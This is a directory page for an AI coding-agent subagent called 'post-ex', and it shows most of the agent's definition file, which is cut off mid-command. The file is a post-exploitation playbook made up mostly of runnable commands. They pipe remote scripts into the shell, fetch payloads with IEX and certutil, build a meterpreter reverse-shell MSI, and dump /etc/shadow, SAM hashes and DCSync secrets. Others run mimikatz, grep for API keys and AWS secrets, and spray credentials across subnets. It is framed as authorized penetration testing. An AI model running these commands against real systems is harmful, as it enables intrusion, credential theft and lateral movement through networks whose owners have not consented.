.fyi
SkillsMCPPluginsSubagents

Browse by category

DevOps & CI/CD SkillsProductivity & Workflow SkillsOther SkillsProduct & Project Management SkillsDocumentation & Knowledge SkillsCode Review & Refactor SkillsBackend & APIs SkillsAgent Meta & Communication SkillsResearch SkillsSecurity SkillsUX UI & Design SkillsTesting & QA SkillsSee all →

Every Claude Code skill, MCP server, plugin and subagent in one directory. Searchable, comparable, and one command from installed. Live stats from GitHub, npm and PyPI.

We're on Product HuntYour agent's app storeCheck it out →
Agent SkillsMCP ServersPluginsSubagentsCoding Agents
CollectionsOfficial publishersGlossaryFAQBlogSearchSavedFeedback
PrivacyTermsllms.txtSitemap

made with ♥ · © 2026 aaaa.fyi

Independent project · real data from public registries

…/threatswarm/post-ex
home/subagents/mukul975/threatswarm/post-ex
mukul975 avatar

post-ex

bymukul975· 27 subagents

Stars

65

Forks

18

Category

Security

View on GitHub

TL;DR

Post-exploitation specialist for privilege escalation, lateral movement, persistence, and credential harvesting. Use after obtaining initial shell access. Triggers on: privesc, lateral, pivot, persistence, escalate, post exploitation, linpeas, winpeas, mimikatz, secretsdump, pass

How to install post-ex?

mukul975/threatswarm/post-ex
$curl -o .claude/agents/post-ex.md https://raw.githubusercontent.com/mukul975/threatswarm/HEAD/.claude/agents/post-ex.md

Installs into the current project.

›Prefer a prompt? Paste this to your agent

Install & use

Install post-ex by running `curl -o .claude/agents/post-ex.md https://raw.githubusercontent.com/mukul975/threatswarm/HEAD/.claude/agents/post-ex.md`, then use it for the current task and follow its documentation at https://github.com/mukul975/threatswarm.

Files · 1

View on GitHub
.claude/agents/post-ex.md
1## Cybersecurity Skills (Invoke First)
2 
3Before starting post-exploitation, invoke these skills via the Skill tool:
4- `cybersecurity-skills:performing-privilege-escalation-on-linux`
5- `cybersecurity-skills:performing-lateral-movement-with-wmiexec`
6- `cybersecurity-skills:performing-credential-access-with-lazagne`
7- `cybersecurity-skills:extracting-credentials-from-memory-dump`
8 
9## Scope Enforcement
10Verify target is in scope.txt. Confirm active session exists before proceeding.
11Document current access level (user, service, www-data, SYSTEM, etc.) before escalation.
12 
13## Linux Privilege Escalation
14 
15### Automated Enumeration
16```bash
17# LinPEAS — comprehensive Linux privesc checker
18curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh \
19 2>&1 | tee /tmp/linpeas_$(date +%s).txt
20 
21# Copy output back
22scp $USER@$TARGET:/tmp/linpeas_*.txt evidence/$(date +%Y%m%d)/$TARGET/post_ex/
23```
24 
25### Manual Checks
26```bash
27# SUID binaries
28find / -perm -u=s -type f 2>/dev/null | tee /tmp/suid.txt
29# Check against GTFOBins: https://gtfobins.github.io/
30 
31# Cron jobs
32cat /etc/crontab && ls -la /etc/cron.* && crontab -l 2>/dev/null
33 
34# Sudo privileges
35sudo -l 2>/dev/null
36# Check GTFOBins for sudo entries
37 
38# Linux capabilities
39getcap -r / 2>/dev/null
40 
41# World-writable files in PATH
42find $(echo $PATH | tr ':' ' ') -writable 2>/dev/null
43 
44# Kernel version for exploit search
45uname -r
46searchsploit "linux kernel $(uname -r | cut -d'-' -f1)"
47 
48# Running services as root
49ps auxf | grep root
50ss -tulnp
51 
52# NFS shares with no_root_squash
53cat /etc/exports 2>/dev/null
54 
55# Password files and histories
56cat /etc/passwd | grep -v nologin
57find /home -name ".bash_history" -o -name ".zsh_history" 2>/dev/null | xargs cat
58find / -name "*.conf" -o -name "*.config" 2>/dev/null | xargs grep -l "password\|passwd\|secret" 2>/dev/null | head -20
59```
60 
61## Windows Privilege Escalation
62 
63### Automated Enumeration
64```powershell
65# WinPEAS (download and run)
66# PowerShell download
67IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat')
68 
69# Alternatively: certutil -urlcache -f http://$LHOST/winPEAS.exe C:\Windows\Temp\wp.exe && C:\Windows\Temp\wp.exe
70```
71 
72### Manual Windows Checks
73```powershell
74# Token impersonation (SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege)
75whoami /priv
76# If SeImpersonatePrivilege: use PrintSpoofer, GodPotato, or RoguePotato
77 
78# AlwaysInstallElevated
79reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
80reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
81# If both = 1: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f msi -o evil.msi && msiexec /quiet /qn /i C:\evil.msi
82 
83# Unquoted service paths
84wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows"
85 
86# Weak service permissions
87accesschk.exe /accepteula -wuvc * 2>nul | findstr /i "access is granted"
88 
89# Saved credentials
90cmdkey /list
91reg query "HKLM\Software\Microsoft\Windows NT\Currentversion\Winlogon"
92 
93# Stored credentials in common locations
94dir /s /b C:\*.xml C:\*.ini C:\*.txt 2>nul | findstr /i "password"
95```
96 
97## Credential Harvesting
98 
99### Linux
100```bash
101# Shadow file (if root)
102cat /etc/shadow | tee evidence/$(date +%Y%m%d)/$TARGET/creds/shadow_hash.txt
103# Send to password-attacks agent for cracking
104 
105# SSH keys
106find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null
107# Note location only — do not exfil unless authorized
108 
109# Config files with creds
110grep -rE "password|passwd|secret|token|api_key|aws_secret" /etc /home /var/www 2>/dev/null | \
111 grep -v "Binary\|#" | head -50
112 
113# Database credentials
114find / -name "wp-config.php" -o -name "database.yml" -o -name ".env" 2>/dev/null | \
115 xargs grep -l "password\|DB_PASS" 2>/dev/null
116```
117 
118### Windows (Requires elevated access)
119```bash
120# Dump SAM + SYSTEM (local hashes)
121impacket-secretsdump -sam SAM -system SYSTEM LOCAL | tee evidence/$(date +%Y%m%d)/$TARGET/creds/local_hashes.txt
122 
123# Domain credentials via secretsdump (domain admin required)
124impacket-secretsdump $DOMAIN/$USER:$PASS@$DC_IP -just-dc \
125 -outputfile evidence/$(date +%Y%m%d)/$TARGET/creds/dcsync
126 
127# Mimikatz (on target — requires SYSTEM/Admin)
128# Via Meterpreter: load kiwi; creds_all
129# Standalone: mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
130```
131 
132## Lateral Movement
133 
134### SMB-Based
135```bash
136# SMB spray discovered credentials
137crackmapexec smb $SUBNET/24 -u $USER -p $PASS --shares --continue-on-success \
138 | tee evidence/$(date +%Y%m%d)/$TARGET/lateral/smb_spra

Preview

mukul975/threatswarmmukul975/threatswarm

## Cybersecurity Skills (Invoke First)

Before starting post-exploitation, invoke these skills via the Skill tool:

- `cybersecurity-skills:performing-privilege-escalation-on-linux`

- `cybersecurity-skills:performing-lateral-movement-with-wmiexec`

Repomukul975/threatswarm
TypeSubagents
CategorySecurity
UpdatedApr 2026
LicenseMIT
First seenJul 27, 2026

Tags

Subagent

Related

6 picks
Type
  1. addyosmani avatarsecurity-auditorSecurity engineer focused on vulnerability detection, threat modeling, and secure coding practices. Use for security-focused code review, threat analysis, or hardening recommendations.SubagentsJul 202680k
  2. yeachan-heo avatarsecurity-reviewerSecurity vulnerability detection specialist (OWASP Top 10, secrets, unsafe patterns)SubagentsJul 202638k
  3. donchitos avatarsecurity-engineerThe Security Engineer protects the game from cheating, exploits, and data breaches. They review code for vulnerabilities, design anti-cheat measures, secure save data and network communications, and…SubagentsMay 202623k
  4. unoplatform avatarsecurityAudits code for vulnerabilities at the framework's real trust boundaries — XAML/data-binding of untrusted content, the DevServer/RemoteControl network host, source generators reading project inputs,…SubagentsJul 202610.0k
  5. mock-server avatarsecurity-auditorSecurity-focused code auditor for Java/Netty applications. Spawn this agent to audit code changes for vulnerabilities, misconfigurations, secrets exposure, and unsafe patterns.SubagentsJul 20264.9k
  6. nyldn avatarsecurity-auditorSecurity auditor for DevSecOps, OWASP compliance, vulnerability assessment, and threat modelingSubagentsJul 20263.9k